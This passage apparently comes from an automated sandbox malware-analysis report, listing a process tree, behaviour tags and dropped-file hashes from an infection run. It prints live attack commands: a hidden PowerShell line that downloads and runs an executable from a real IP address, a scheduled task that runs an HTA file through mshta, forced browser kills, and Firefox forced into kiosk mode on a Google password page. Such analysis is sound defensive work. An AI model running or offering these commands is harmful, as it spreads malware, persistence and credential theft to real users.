                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
                                                                    5⤵
                                                                    • Uses browser remote debugging
                                                                    PID:2964
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
                                                                    5⤵
                                                                    • Uses browser remote debugging
                                                                    PID:5136
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2228 /prefetch:2
                                                                    5⤵
                                                                      PID:6860
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
                                                                      5⤵
                                                                        PID:2972
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2896 /prefetch:2
                                                                        5⤵
                                                                          PID:1260
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4872 /prefetch:2
                                                                          5⤵
                                                                            PID:4240
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2232 /prefetch:2
                                                                            5⤵
                                                                              PID:2068
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2568 /prefetch:2
                                                                              5⤵
                                                                                PID:2380
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2136 /prefetch:2
                                                                                5⤵
                                                                                  PID:6972
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1
                                                                                  5⤵
                                                                                  • Uses browser remote debugging
                                                                                  PID:1972
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
                                                                                  5⤵
                                                                                  • Uses browser remote debugging
                                                                                  PID:404
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13254879710718558422,17984244814760661156,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5088 /prefetch:2
                                                                                  5⤵
                                                                                    PID:424
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 2420
                                                                                  4⤵
                                                                                  • Program crash
                                                                                  PID:6976
                                                                              • C:\Users\Admin\AppData\Local\Temp\1086797001\18e34ec326.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\1086797001\18e34ec326.exe"
                                                                                3⤵
                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                • Checks BIOS information in registry
                                                                                • Executes dropped EXE
                                                                                • Identifies Wine through registry keys
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                PID:5920
                                                                              • C:\Users\Admin\AppData\Local\Temp\1086798001\73645cf365.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\1086798001\73645cf365.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious use of SendNotifyMessage
                                                                                PID:536
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /F /IM firefox.exe /T
                                                                                  4⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Kills process with taskkill
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:4084
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /F /IM chrome.exe /T
                                                                                  4⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Kills process with taskkill
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:6952
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /F /IM msedge.exe /T
                                                                                  4⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Kills process with taskkill
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:812
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /F /IM opera.exe /T
                                                                                  4⤵
                                                                                  • Kills process with taskkill
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:6424
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /F /IM brave.exe /T
                                                                                  4⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Kills process with taskkill
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:544
                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                  4⤵
                                                                                    PID:1480
                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                      5⤵
                                                                                      • Checks processor information in registry
                                                                                      • Modifies registry class
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of SendNotifyMessage
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:2424
                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1992 -parentBuildID 20240401114208 -prefsHandle 1920 -prefMapHandle 1912 -prefsLen 31241 -prefMapSize 245214 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1d51885b-6010-49f8-9950-d417addef803} 2424 "\\.\pipe\gecko-crash-server-pipe.2424" gpu
                                                                                        6⤵
                                                                                          PID:1704
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2480 -parentBuildID 20240401114208 -prefsHandle 2464 -prefMapHandle 2460 -prefsLen 32161 -prefMapSize 245214 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {066d0b0f-4d09-427a-9f67-a1192eb35065} 2424 "\\.\pipe\gecko-crash-server-pipe.2424" socket
                                                                                          6⤵
                                                                                            PID:5568
                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2764 -childID 1 -isForBrowser -prefsHandle 3312 -prefMapHandle 3120 -prefsLen 25834 -prefMapSize 245214 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3b794bed-6daa-42c6-82b5-ee919e26774a} 2424 "\\.\pipe\gecko-crash-server-pipe.2424" tab
                                                                                            6⤵
                                                                                              PID:4996
                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4060 -childID 2 -isForBrowser -prefsHandle 4084 -prefMapHandle 4080 -prefsLen 36594 -prefMapSize 245214 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {be57213c-d726-4138-b10e-d16e3835b1b5} 2424 "\\.\pipe\gecko-crash-server-pipe.2424" tab
                                                                                              6⤵
                                                                                                PID:2880
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4840 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4944 -prefMapHandle 4940 -prefsLen 36648 -prefMapSize 245214 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bcd42274-ef47-4156-aced-4416c8e86f8e} 2424 "\\.\pipe\gecko-crash-server-pipe.2424" utility
                                                                                                6⤵
                                                                                                • Checks processor information in registry
                                                                                                PID:4036
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5172 -childID 3 -isForBrowser -prefsHandle 5240 -prefMapHandle 5236 -prefsLen 30180 -prefMapSize 245214 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6b5de15-d20c-4ad0-b642-e01320d876b4} 2424 "\\.\pipe\gecko-crash-server-pipe.2424" tab
                                                                                                6⤵
                                                                                                  PID:3456
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5380 -childID 4 -isForBrowser -prefsHandle 5176 -prefMapHandle 5200 -prefsLen 30180 -prefMapSize 245214 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed6f6c2f-5971-4f6c-ae02-cc945fd3da42} 2424 "\\.\pipe\gecko-crash-server-pipe.2424" tab
                                                                                                  6⤵
                                                                                                    PID:1452
                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5612 -childID 5 -isForBrowser -prefsHandle 5604 -prefMapHandle 5600 -prefsLen 30180 -prefMapSize 245214 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ccd4f2d3-0060-4d08-8e58-5d800d76c5ca} 2424 "\\.\pipe\gecko-crash-server-pipe.2424" tab
                                                                                                    6⤵
                                                                                                      PID:5180
                                                                                              • C:\Users\Admin\AppData\Local\Temp\1086799001\c25e86d7df.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\1086799001\c25e86d7df.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                PID:1640
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c schtasks /create /tn DzwxgmakAjO /tr "mshta C:\Users\Admin\AppData\Local\Temp\faj9tWrzy.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                  4⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:3540
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /create /tn DzwxgmakAjO /tr "mshta C:\Users\Admin\AppData\Local\Temp\faj9tWrzy.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                    5⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:5596
                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                  mshta C:\Users\Admin\AppData\Local\Temp\faj9tWrzy.hta
                                                                                                  4⤵
                                                                                                  • Checks computer location settings
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:2100
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RSPGZQOVMRYPJWA926GQX6WJA8DATYL4.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                                                                    5⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Downloads MZ/PE file
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5928
                                                                                                    • C:\Users\Admin\AppData\Local\TempRSPGZQOVMRYPJWA926GQX6WJA8DATYL4.EXE
                                                                                                      "C:\Users\Admin\AppData\Local\TempRSPGZQOVMRYPJWA926GQX6WJA8DATYL4.EXE"
                                                                                                      6⤵
                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Executes dropped EXE
                                                                                                      • Identifies Wine through registry keys
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:6328
                                                                                          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                            1⤵
                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                            • Checks BIOS information in registry
                                                                                            • Executes dropped EXE
                                                                                            • Identifies Wine through registry keys
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:2568
                                                                                          • C:\ProgramData\eimurvb\fmrsbin.exe
                                                                                            C:\ProgramData\eimurvb\fmrsbin.exe start2
                                                                                            1⤵
                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                            • Checks BIOS information in registry
                                                                                            • Executes dropped EXE
                                                                                            • Identifies Wine through registry keys
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:2592
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2856 -ip 2856
                                                                                            1⤵
                                                                                              PID:836
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1244 -ip 1244
                                                                                              1⤵
                                                                                                PID:1684
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1480 -ip 1480
                                                                                                1⤵
                                                                                                  PID:4632
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2964 -ip 2964
                                                                                                  1⤵
                                                                                                    PID:2132
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2952 -ip 2952
                                                                                                    1⤵
                                                                                                      PID:4056
                                                                                                    • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                      1⤵
                                                                                                        PID:5228
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                        1⤵
                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Executes dropped EXE
                                                                                                        • Identifies Wine through registry keys
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:6188
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:6640
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                        1⤵
                                                                                                          PID:7020
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5860 -ip 5860
                                                                                                          1⤵
                                                                                                            PID:6004
                                                                                                          • C:\ProgramData\fnpg\xlxlx.exe
                                                                                                            C:\ProgramData\fnpg\xlxlx.exe start2
                                                                                                            1⤵
                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Executes dropped EXE
                                                                                                            • Identifies Wine through registry keys
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:6012
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 6872 -ip 6872
                                                                                                            1⤵
                                                                                                              PID:7116
                                                                                                            • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                              1⤵
                                                                                                                PID:3864
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                1⤵
                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Executes dropped EXE
                                                                                                                • Identifies Wine through registry keys
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                PID:4212
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5928
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5000 -ip 5000
                                                                                                                1⤵
                                                                                                                  PID:1728

                                                                                                                Network

                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                Replay Monitor

                                                                                                                Loading Replay Monitor...

                                                                                                                Downloads

                                                                                                                • C:\ProgramData\mozglue.dll

                                                                                                                  Filesize

                                                                                                                  593KB

                                                                                                                  MD5

                                                                                                                  c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                  SHA1

                                                                                                                  95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                  SHA256

                                                                                                                  ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                  SHA512

                                                                                                                  fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                • C:\Temp\koWg8wZ64.hta

                                                                                                                  Filesize

                                                                                                                  782B

                                                                                                                  MD5

                                                                                                                  16d76e35baeb05bc069a12dce9da83f9

                                                                                                                  SHA1

                                                                                                                  f419fd74265369666595c7ce7823ef75b40b2768

                                                                                                                  SHA256

                                                                                                                  456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7

                                                                                                                  SHA512

                                                                                                                  4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

                                                                                                                • C:\Users\Admin:.repos

                                                                                                                  Filesize

                                                                                                                  1.2MB

                                                                                                                  MD5

                                                                                                                  52bd21aaac0bcc30fc7e6fa466a82a01

                                                                                                                  SHA1

                                                                                                                  4955a63fb93a0d627debf7bc36b950e9bfdc7a97

                                                                                                                  SHA256

                                                                                                                  9b21dd91a9c83f660fd5ca1fdd6ea5a7412f2b54e64be5dafa4b5b31980ae201

                                                                                                                  SHA512

                                                                                                                  5ebf6aab41a0760d1ce876bf31b9196910f45eef4f7b5e7083a2a6c84071167f54c123fef21688e141240caef2441e8cff6e52899893f88dca2e2e5c19d541d8

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                                                                                  Filesize

                                                                                                                  40B

                                                                                                                  MD5

                                                                                                                  37146d048bb6c4fe09bf6e6cd7568dd6

                                                                                                                  SHA1

                                                                                                                  f45d995f00f4d9f7cbe22375c016d466425d7f1c

                                                                                                                  SHA256

                                                                                                                  69ac9406b76b4df9b8448f5514ca141d4e10063b4c0212118b34f826644b0675

                                                                                                                  SHA512

                                                                                                                  9cd9a84ec572f0a5a5d7387613e05ff2f8f56267c4f8039eb9d570a1487970628773c929d44466271611993282ee2e0ad5dbada5a5fa45f2595c3a578b2dd0b9

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\6bdee30a-1e3b-4c69-b67f-3e20d994dae9.tmp

                                                                                                                  Filesize

                                                                                                                  1B

                                                                                                                  MD5

                                                                                                                  5058f1af8388633f609cadb75a75dc9d

                                                                                                                  SHA1

                                                                                                                  3a52ce780950d4d969792a2559cd519d7ee8c727

                                                                                                                  SHA256

                                                                                                                  cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                                                                                  SHA512

                                                                                                                  0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                  Filesize

                                                                                                                  2B

                                                                                                                  MD5

                                                                                                                  d751713988987e9331980363e24189ce

                                                                                                                  SHA1

                                                                                                                  97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                  SHA256

                                                                                                                  4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                  SHA512

                                                                                                                  b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                  Filesize

                                                                                                                  2KB

                                                                                                                  MD5

                                                                                                                  25604a2821749d30ca35877a7669dff9

                                                                                                                  SHA1

                                                                                                                  49c624275363c7b6768452db6868f8100aa967be

                                                                                                                  SHA256

                                                                                                                  7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

                                                                                                                  SHA512

                                                                                                                  206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

                                                                                                                  Filesize

                                                                                                                  686B

                                                                                                                  MD5

                                                                                                                  8e3e847a8d42cf2b734fabbb819d015a

                                                                                                                  SHA1

                                                                                                                  27357bfed1a848dbba6ce17d346df020d73eb33d

                                                                                                                  SHA256

                                                                                                                  d11169c718961e73116b73deb5c4148d6bd2fcb6f13b368d8b3731a750e1c461

                                                                                                                  SHA512

